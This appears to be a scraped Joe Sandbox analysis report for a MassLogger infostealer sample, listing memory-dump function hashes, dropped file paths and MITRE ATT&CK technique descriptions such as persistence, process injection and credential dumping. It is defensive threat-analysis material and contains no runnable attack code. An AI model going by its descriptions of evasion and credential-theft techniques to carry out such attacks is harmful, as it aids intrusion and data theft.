Instruction Fuzzy Hash: 00016D32F402545FEB24ABBA986562F7ADBAFC4664321853DD905C7354FFB1C8028A91

Function 027AA508 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2612804848.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_27a0000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beb2ad3d5beb09e813339797e80bdd073e76449e597694a6ece7adbf26f77189
Instruction ID: fde33bcab43a4ecdf4befa4295611cfb952ac96f2cf33b83fde842faab88d8c3
Opcode Fuzzy Hash: beb2ad3d5beb09e813339797e80bdd073e76449e597694a6ece7adbf26f77189
Instruction Fuzzy Hash: 24018C75E002199FDB15DFA8D8595AE7FB5FB88310B00412AF91A93381DF308D50CBA1

Function 027AA4F9 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2612804848.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_27a0000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c65dbeddf05a0534d6c760a04257570092338546c7ac8f211ac76b61b10dc35a
Instruction ID: fb65d873b8eb72e7275d05c52c2b8e9cc9451deb77cc9c069f0fa38b9b05839f
Opcode Fuzzy Hash: c65dbeddf05a0534d6c760a04257570092338546c7ac8f211ac76b61b10dc35a
Instruction Fuzzy Hash: 2F018F71E14159AFDB15DFA8D8549EE7FB5FF88310B10412AF919D3281DB308D50CBA2

Function 027ABEF8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2612804848.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_27a0000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e30ae58aac54f17bd47ae7b84890bf7987e019bebfa074151facd478de38bacb
Instruction ID: 1a9454323caea48ba6f080fa79ab88af51904dcc9fc5ca1a10ab34a73184058e
Opcode Fuzzy Hash: e30ae58aac54f17bd47ae7b84890bf7987e019bebfa074151facd478de38bacb
Instruction Fuzzy Hash: E5F04C327002044BDB161B74A80A96D3FDAEBC9621F14442AF50AC7781DF35CC42C780

Function 027AC1B0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2612804848.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_27a0000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b678f60fe08cefc41bc0cf491063734f7bd1b17efe5eb151fee4e84afd36cc16
Instruction ID: ddf490612f1607e7d23ba4c6972ecf8296dee9ef2f751dbd7b84a4817bfb5cc7
Opcode Fuzzy Hash: b678f60fe08cefc41bc0cf491063734f7bd1b17efe5eb151fee4e84afd36cc16
Instruction Fuzzy Hash: FBF0A072B046119BCB1A576EE42496EBBAADFD5635714017FF509DB390CF32DC028B90

Function 027AB9EA Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2612804848.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_27a0000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e4e783327bbc0bbcd7ac88830d797983c336b40607c6294d7f51c65cb8d8737
Instruction ID: 7d5e03ec2f670177defdb9df94a0d46e74f4e1b3f5909537b2e4930d789d8fcf
Opcode Fuzzy Hash: 0e4e783327bbc0bbcd7ac88830d797983c336b40607c6294d7f51c65cb8d8737
Instruction Fuzzy Hash: A1F0BB75905208AF9B51DFADD88099FBBF5FF98250704453AE505E3201D770A905CFE1

Function 027A46C9 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2612804848.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_27a0000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44fa58ab7631c6ef0eaa05f426eba15b8cc76ce683f5ea8d6f61f8526b3d5908
Instruction ID: cbae98e5f8eb34a48b942999ee48c2cbc3a5d0062f490f20bb02545a2c4b1538
Opcode Fuzzy Hash: 44fa58ab7631c6ef0eaa05f426eba15b8cc76ce683f5ea8d6f61f8526b3d5908
Instruction Fuzzy Hash: 01F01534CA339A8BD7222B34A4AD3BE7F71EB4B317B943D40A00BC1812CB7104A5CA44

Function 027AB9F8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2612804848.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_27a0000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca328239b7c85cf8284e4252922543e271817ff6389f76fd358d52e5d03743e8
Instruction ID: ddcbc494bd2eede20164a5663fd1089138d10f9de86a7a914a757bbcf1073445
Opcode Fuzzy Hash: ca328239b7c85cf8284e4252922543e271817ff6389f76fd358d52e5d03743e8
Instruction Fuzzy Hash: E4F08271A052089F8B50DFA9984099FBBF6FBD8250B00463AD509E3201E770A911CBE1

Function 027A1877 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2612804848.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_27a0000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ec3d9df6e7f593e76ebddbede8f339c3bc7957c828c39f5043856c5850a1ba9
Instruction ID: 793dd0ae159a69582555c1f8ca0e42aa79fbd33172984deb08190b80ee2cb8de
Opcode Fuzzy Hash: 8ec3d9df6e7f593e76ebddbede8f339c3bc7957c828c39f5043856c5850a1ba9
Instruction Fuzzy Hash: 91E02231D1126A9ECB02ABA48C250FEBB34BED3231F8103A3D01437040EB30155AC7A1

Function 027A46D8 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2612804848.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_27a0000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2f5320014ea9aa691dcbd0c5184d7862a9a2aad335e371f6dde65c3a0faa872
Instruction ID: ec9e6346b7123fdf94f530640ec238bf83c06380f494948af7e883099254fb05
Opcode Fuzzy Hash: e2f5320014ea9aa691dcbd0c5184d7862a9a2aad335e371f6dde65c3a0faa872
Instruction Fuzzy Hash: E6E0F639CA334A8BE7112B65A5AD23E7AA5EB4B317B907D05A00BC1821DF7144A48A54

Function 027A1888 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2612804848.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_27a0000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1d1264d61980ea0f98fb12ebab32053d36d3ac4ff7ee7cffe256313f6941232
Instruction ID: c180e3a2f6d98dab60d299ce0d4ac4e97758c8ab9aea5d36d24cd10fd5bc3f28
Opcode Fuzzy Hash: d1d1264d61980ea0f98fb12ebab32053d36d3ac4ff7ee7cffe256313f6941232
Instruction Fuzzy Hash: 56D01231D6022A978B00AAA5DC044EEBB38FED5221B514666D51437140EF702669C6E1

Function 027A4830 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2612804848.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_27a0000_JkYcIYq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 957913cdca889620176fa5cac04c4bde4614dde42fd56422322401f7ebf0dcec
Instruction ID: 88ba30de6e5d560484c5c36c114e68b07cebeb1ef8b547b665bcc7386c07cf51
Opcode Fuzzy Hash: 957913cdca889620176fa5cac04c4bde4614dde42fd56422322401f7ebf0dcec
Instruction Fuzzy Hash: F2C04C6450D3C04ECB6B5B7455390197F715E87205F6859DFE0C187052D6366115C706

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Contrarre.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Contrarre.scr.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JkYcIYq.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_50kzxmxd.j1b.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0vcoord.cue.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j10uuvut.d50.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xttxeirf.z5w.ps1

C:\Users\user\AppData\Local\Temp\tmp3B82.tmp

C:\Users\user\AppData\Local\Temp\tmp48FF.tmp

C:\Users\user\AppData\Roaming\JkYcIYq.exe

C:\Users\user\AppData\Roaming\JkYcIYq.exe:Zone.Identifier

Static File Info

Windows Analysis Report
Contrarre.scr.exe

Function 01853540 Relevance: 2.8, Strings: 2, Instructions: 266
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre